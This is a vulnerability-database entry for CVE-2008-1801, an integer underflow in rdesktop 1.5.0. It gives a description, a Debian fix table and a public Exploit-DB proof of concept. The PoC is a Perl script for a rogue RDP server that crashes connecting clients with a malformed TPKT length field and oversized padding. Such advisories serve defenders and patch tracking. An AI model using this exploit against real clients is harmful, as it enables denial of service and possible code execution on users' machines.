CVE-2008-1801
Description
Integer underflow in the iso_recv_msg function (iso.c) in rdesktop 1.5.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Remote Desktop Protocol (RDP) request with a small length field.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)
#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);
while(my $c = $sock->accept())
{
print $c "\x03" .# TPKT version
"\x00" .# reserved
"\x00\x01" .# evil length here
"\x06\xd0\x00\x00\x12\x34\x00" .
"\x41" x 204942;
sleep 1;
close $sock;
}
# milw0rm.com [2008-05-08]OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1.5.0-4+cvs20071006 |
| sid | Fixed | 1.5.0-4+cvs20071006 |
| forky | Fixed | 1.5.0-4+cvs20071006 |
| bullseye | Fixed | 1.5.0-4+cvs20071006 |
| bookworm | Fixed | 1.5.0-4+cvs20071006 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.